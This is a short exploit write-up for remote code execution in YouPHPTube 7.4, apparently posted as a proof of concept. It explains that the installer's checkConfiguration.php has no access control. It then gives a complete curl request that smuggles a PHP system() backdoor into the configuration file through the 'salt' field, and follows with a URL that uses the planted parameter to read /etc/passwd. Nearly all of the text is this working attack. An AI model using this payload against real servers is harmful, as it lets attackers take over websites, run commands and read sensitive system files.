YouPHPTube 7.4 Remote Code Execution
install/checkConfiguration.php has no access control, which leads to everyone being able to edit the configuration file, and insert malicious PHP code.<=7.4/install/checkConfiguration.phpTo exploit this, we will generate a new malicious config file using the command above. The databaseName must be unique and databaseHost accessible.
curl -s "TARGET/install/checkConfiguration.php" -d "contactEmail=fake-email@fake.com&createTables=2&mainLanguage=RCE&salt=';system(\$_GET['bots']);echo '&systemAdminPass=zerodays.LOL&systemRootPath=/var/www/html/&webSiteRootURL=/var/www/html/&webSiteTitle=Site-Title-Here&databaseHost=127.0.0.1&databaseName=Any-DBname-Here&databasePass=&databasePort=3306&databaseUser=root"
Visit site and add param bots= to the URL to gain RCE http://put-ip-here/?bots=cat+/etc/passwd.